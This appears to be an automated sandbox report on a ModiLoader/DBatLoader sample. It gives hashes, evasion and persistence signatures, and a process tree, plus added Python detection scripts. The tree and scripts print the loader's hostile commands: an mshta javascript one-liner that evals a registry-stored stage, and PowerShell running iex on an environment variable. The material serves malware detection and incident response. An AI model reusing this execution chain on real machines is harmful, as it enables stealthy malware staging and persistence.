Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-05-2024 04:04

General

  • Target
    231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe
  • Size
    260KB
  • MD5
    231d93afc1ca094a42dc22bef5ffa89e
  • SHA1
    c788c8b7ee766e8770084ed260c976481b6395dc
  • SHA256
    562ba4904106bb5d15d9ff98c67076ad64759de1512e189f590c3986fa14b5d8
  • SHA512
    6eb8030b7663f54d855a283eea3f93bce33027d74f1cd12122479b78bb6adc871be58ca1eefb3c3249941ff2d7bafcbd4aff3ed486274e8f0df84cb8c4262fe4
  • SSDEEP
    6144:TojPGsjKyqnH8nZwM7I4Ar2TFYYjHlQb/:Teeshqncnjc4R7jHlQb/

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 60 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
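The signatures above are the sandbox's view of one process (the first regsvr32.exe) probing for VirtualBox, VMware Tools, BIOS strings and attached disks through the registry and then writing a Run key. The same behaviour is visible in registry telemetry (Sysmon events 12/13 or an EDR's registry records), and it is the combination, several evasion reads followed by a persistence write from one PID, that separates a loader from an inventory agent or an installer. The script below is an added example, not part of this report; the key paths are the well-known locations these checks read and are an assumption (the report names the checks, not the exact keys), and the events are constructed to mirror what the report attributes to PID 1836 next to two benign look-alikes.

```python
"""Score registry telemetry against the anti-analysis checks this report lists.

Added example, not part of the sandbox report. Key paths are assumed
(well-known locations for these checks); events below are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class RegEvent:
    pid: int
    op: str      # "QueryValue" / "QueryKey" / "SetValue", Sysmon 12/13 style
    path: str


# (signature name as printed in the report, operation prefix, regex over the key path).
# The paths are assumptions drawn from where these checks usually look; adjust to your telemetry.
SIGNATURES = [
    ("Looks for VirtualBox Guest Additions in registry", "Query",
     r"\\SOFTWARE\\(Wow6432Node\\)?Oracle\\VirtualBox Guest Additions"),
    ("Looks for VMWare Tools registry key", "Query",
     r"\\SOFTWARE\\(Wow6432Node\\)?VMware, Inc\.\\VMware Tools"),
    ("Checks BIOS information in registry", "Query",
     r"\\HARDWARE\\DESCRIPTION\\System\\(SystemBiosVersion|VideoBiosVersion)$"),
    ("Maps connected drives based on registry", "Query",
     r"\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Services\\Disk\\Enum"),
    ("Checks for common network interception software", "Query",
     r"\\SOFTWARE\\(Wow6432Node\\)?(Wireshark|Microsoft\\Fiddler2)"),
    ("Adds Run key to start application", "Set",
     r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$"),
]
PERSIST = "Adds Run key to start application"

# Constructed sample: PID 1836 reproduces the report's hits; 4012 is a benign updater that only
# writes its own Run value; 900 is an inventory tool reading the BIOS string; 777 is noise.
SAMPLE_REG_EVENTS = [
    RegEvent(1836, "QueryValue", r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"),
    RegEvent(1836, "QueryValue", r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"),
    RegEvent(1836, "QueryValue", r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    RegEvent(1836, "QueryKey",   r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum"),
    RegEvent(1836, "SetValue",   r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update"),
    RegEvent(4012, "SetValue",   r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdaterAgent"),
    RegEvent(900,  "QueryValue", r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    RegEvent(777,  "QueryValue", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName"),
]


def match_event(ev: RegEvent) -> list[str]:
    """Names of every signature whose operation and path pattern fit this event."""
    return [name for name, op, pat in SIGNATURES
            if ev.op.startswith(op) and re.search(pat, ev.path, re.I)]


def score(events, min_evasion_checks: int = 2) -> dict:
    """Per PID: signatures hit, and a verdict that needs either several evasion
    reads or at least one evasion read combined with a persistence write."""
    hits: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        for name in match_event(ev):
            hits[ev.pid].add(name)
    verdict = {}
    for pid, names in hits.items():
        evasion = {n for n in names if n != PERSIST}
        suspicious = len(evasion) >= min_evasion_checks or (bool(evasion) and PERSIST in names)
        verdict[pid] = {"signatures": sorted(names), "suspicious": suspicious}
    return verdict


if __name__ == "__main__":
    for pid, v in score(SAMPLE_REG_EVENTS).items():
        print(pid, v)
```

A single BIOS read (PID 900) or a lone Run write (PID 4012) scores as benign; the loader's process scores on both counts. Keep the per-key patterns loose on the Wow6432Node prefix, since this sample is 32-bit code on a 64-bit image and its reads are redirected.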

Processes

  • C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe"
      2⤵
        PID:2464
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:KuJ0veuR2="y5fnkmm";dH99=new%20ActiveXObject("WScript.Shell");ACq4tS2s="La2yE";Ewm6W=dH99.RegRead("HKLM\\software\\Wow6432Node\\WbKqYpL\\EuI9vnci");ZkBAqjI5="dQsw9o7L";eval(Ewm6W);ln7rI8sR="e";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xzsaijuw
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1052
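The tree above is the whole infection chain in four command lines: mshta.exe runs an inline javascript: URL that reads the next stage out of a registry value and eval()s it, that stage starts 32-bit PowerShell with iex $env:xzsaijuw (the payload handed over in an environment variable), and PowerShell launches regsvr32.exe with no module to register, which is then used as a host for injected code (SetThreadContext, WriteProcessMemory) and spawns a second regsvr32.exe. None of the binaries are unusual on their own; the command-line shapes and the parent-child order are what to detect. The script below is an added example, not part of this report: it classifies process-creation records by those shapes, pulls the registry path out of the mshta script so an responder knows where the stage lives, and walks parent links to find the mshta -> powershell -> regsvr32 lineage. The events are constructed from the PIDs and command lines above; the parent of mshta.exe is not shown in the report, so its ppid is a placeholder.

```python
"""Process-tree triage for the mshta -> powershell -> regsvr32 chain in this report.

Added example, not part of the sandbox report. Events are constructed from the
Processes section; real telemetry (Sysmon event 1, EDR process starts) has the
same four fields.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


CMD_MSHTA = (r'"C:\Windows\system32\mshta.exe" javascript:KuJ0veuR2="y5fnkmm";'
             r'dH99=new%20ActiveXObject("WScript.Shell");ACq4tS2s="La2yE";'
             r'Ewm6W=dH99.RegRead("HKLM\\software\\Wow6432Node\\WbKqYpL\\EuI9vnci");'
             r'ZkBAqjI5="dQsw9o7L";eval(Ewm6W);ln7rI8sR="e";')

SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe"

# Constructed sample modelled on the report's tree; ppid 0 means "not shown in the report".
SAMPLE_EVENTS = [
    ProcEvent(2428, 0, SAMPLE_EXE, f'"{SAMPLE_EXE}"'),
    ProcEvent(2464, 2428, SAMPLE_EXE, f'"{SAMPLE_EXE}"'),
    ProcEvent(2648, 0, r"C:\Windows\system32\mshta.exe", CMD_MSHTA),
    ProcEvent(2716, 2648, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xzsaijuw'),
    ProcEvent(1836, 2716, r"C:\Windows\SysWOW64\regsvr32.exe", "regsvr32.exe"),
    ProcEvent(1052, 1836, r"C:\Windows\SysWOW64\regsvr32.exe", r'"C:\Windows\SysWOW64\regsvr32.exe"'),
]

CHAIN = ["mshta.exe", "powershell.exe", "regsvr32.exe"]


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def extract_regread_paths(cmdline: str) -> list[str]:
    """Registry values the inline script reads: where the next stage is stored."""
    script = unquote(cmdline)          # mshta treats javascript: as a URL, hence the %20
    paths = re.findall(r'\.RegRead\(\s*"([^"]+)"\s*\)', script)
    return [p.replace("\\\\", "\\") for p in paths]   # undo JS string escaping


def classify(ev: ProcEvent) -> set[str]:
    """Per-process indicators, one per link of the chain shown in the report."""
    name, cmd = _basename(ev.image), unquote(ev.cmdline)
    tags: set[str] = set()
    if name == "mshta.exe" and "javascript:" in cmd.lower():
        tags.add("mshta_inline_script")
        if re.search(r"\.RegRead\(", cmd) and re.search(r"\beval\(", cmd):
            tags.add("mshta_registry_payload_eval")
    if name == "powershell.exe" and re.search(r"\b(iex|invoke-expression)\b[^;|]*\$env:", cmd, re.I):
        tags.add("powershell_iex_env_var")
    if name == "regsvr32.exe" and not re.search(r"\.(dll|ocx|ax)\b", cmd, re.I):
        tags.add("regsvr32_without_module")   # nothing to register: a host for injected code
    return tags


def _lineage(ev: ProcEvent, by_pid: dict) -> list[ProcEvent]:
    """Ancestors root-first, stopping at unknown or cyclic ppids."""
    chain, seen = [ev], {ev.pid}
    while chain[-1].ppid in by_pid and chain[-1].ppid not in seen:
        parent = by_pid[chain[-1].ppid]
        seen.add(parent.pid)
        chain.append(parent)
    return chain[::-1]


def find_lolbin_chains(events) -> list[list[int]]:
    """PIDs (mshta down to the leaf) of every regsvr32 whose ancestry contains
    mshta, then powershell, in that order, with any depth between them."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if _basename(ev.image) != "regsvr32.exe":
            continue
        lineage = _lineage(ev, by_pid)
        names = [_basename(e.image) for e in lineage]
        want = 0
        for n in names:                    # ordered-subsequence match against CHAIN
            if want < len(CHAIN) and n == CHAIN[want]:
                want += 1
        if want == len(CHAIN):
            hits.append([e.pid for e in lineage[names.index("mshta.exe"):]])
    return hits


def triage(events) -> dict:
    """PID -> sorted indicator tags, only for processes that raised at least one."""
    out = {}
    for e in events:
        tags = classify(e)
        if tags:
            out[e.pid] = sorted(tags)
    return out


if __name__ == "__main__":
    for pid, tags in triage(SAMPLE_EVENTS).items():
        print(pid, tags)
    print("chains:", find_lolbin_chains(SAMPLE_EVENTS))
    print("payload key:", extract_regread_paths(CMD_MSHTA))
```

The registry path recovered from the mshta script (HKLM\software\Wow6432Node\WbKqYpL\EuI9vnci, redirected to the Wow6432Node view because the loader is 32-bit) is the first thing to export during response: the environment variable read by PowerShell is gone with the process, but the registry value survives a reboot.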

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\43e4\8d79.6f350
    Filesize 9KB
    MD5 557d5ef03cd7fe983967ae30fd651e09
    SHA1 01774b6c426526b29900133386351480168d3b92
    SHA256 5b0b89faec162bd9751299ef418898e94d6d2708adbf781d5955de041d769810
    SHA512 69c1ce2530be1848fcf46e0f93b590429926c4e4c8ec7e5cda6039c5dd710ca504f33bcbf50bcc139de8ad0eb23c33eb7e5cc7d0a0b00b8a7f64fb7275cf4dc4

  • C:\Users\Admin\AppData\Local\43e4\b67d.bat
    Filesize 55B
    MD5 27ce144177a8617384899301a2b4330f
    SHA1 1dead7588f1982006065dc8a25deb05385fbe649
    SHA256 fa24ed9d8ea201f657bfea7f56fc698a39216eecccdc29fc0a12dc3592badce4
    SHA512 0724ac2a3c9321241afdaad3fed8923b5748a47fde6319daf4fd320420a0a20e5487c5c1e36bdea009c5e686371fd172832ba92e4e9086f307afb7d8c741608b

  • C:\Users\Admin\AppData\Local\43e4\fa89.lnk
    Filesize 857B
    MD5 a63513a04f3145a86623770392e17f85
    SHA1 aedc23609bdfbd6a9b307ef8cdf564a2a0595589
    SHA256 bfcb7bdfe5c891890e284c91d2fd3bb0ef46363bd9946d9f52ca4c2be6615731
    SHA512 562349ce4c6f9776b17c167775cc9f1f136fd33dd577303d15c4a69bda662efd40d2b41595f80d91ed2ddee4d68cb1b0e2a4b6f4fd076a9642c4a580bc02b407

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3011.lnk
    Filesize 975B
    MD5 70651a4a48ed6d78f49a454134b9b191
    SHA1 6f3a6b378f3072262cbcf9fc5ca9953805efde3a
    SHA256 9dec0129956599927f90c9ec7ddc41f4d3bf3ce7c7ce3c7f74d1dd1b5abc0b23
    SHA512 9f357f9044a012931317a274080cd45651c9c4af518a1edf052d47c74765c54f410ede5d5bb0f71b9c5ebec1cd8b21e827f3587193269411f2b3c99cceaf7f31

  • C:\Users\Admin\AppData\Roaming\ef44\0b63.6f350
    Filesize 49KB
    MD5 e3601c7fc9b3ea1c8d158655b315c4f4
    SHA1 b4762a047e83fdc007db006575850d133eb75d33
    SHA256 f947c04096d1527ceeba78890f60663a78f26e9d58f78c3e9258416f7f205980
    SHA512 888dcbae0d57d5f76d1c5b5e7dc459141835ff302de0be5aa424503455f2d92431011f6be4be2075721fc01ebb6d7173a070181f0726a567fbe9f6efc4c2c237

  • memory/1052-72-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-73-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-74-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-75-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-76-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-77-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-78-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-79-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-80-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-81-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-82-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-83-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-84-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-85-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-86-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB
  • memory/1052-87-0x00000000001F0000-0x0000000000331000-memory.dmp  Filesize 1.3MB

  • memory/1836-23-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-25-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-27-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-28-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-29-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-30-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-31-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-32-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-33-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-34-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-35-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-36-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-37-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-38-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-39-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-40-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-41-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-42-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-43-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-44-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-45-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-46-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-47-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-48-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-49-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-54-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-55-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-56-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-57-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-58-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-59-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB
  • memory/1836-66-0x00000000000F0000-0x0000000000231000-memory.dmp  Filesize 1.3MB

  • memory/2464-2-0x0000000000400000-0x000000000043A000-memory.dmp  Filesize 232KB
  • memory/2464-4-0x0000000000400000-0x000000000043A000-memory.dmp  Filesize 232KB
  • memory/2464-5-0x0000000000400000-0x000000000043A000-memory.dmp  Filesize 232KB
  • memory/2464-6-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-7-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-8-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-9-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-10-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-11-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB
  • memory/2464-12-0x0000000000220000-0x00000000002F6000-memory.dmp  Filesize 856KB

  • memory/2716-21-0x0000000005860000-0x0000000005936000-memory.dmp  Filesize 856KB
  • memory/2716-26-0x0000000005860000-0x0000000005936000-memory.dmp  Filesize 856KB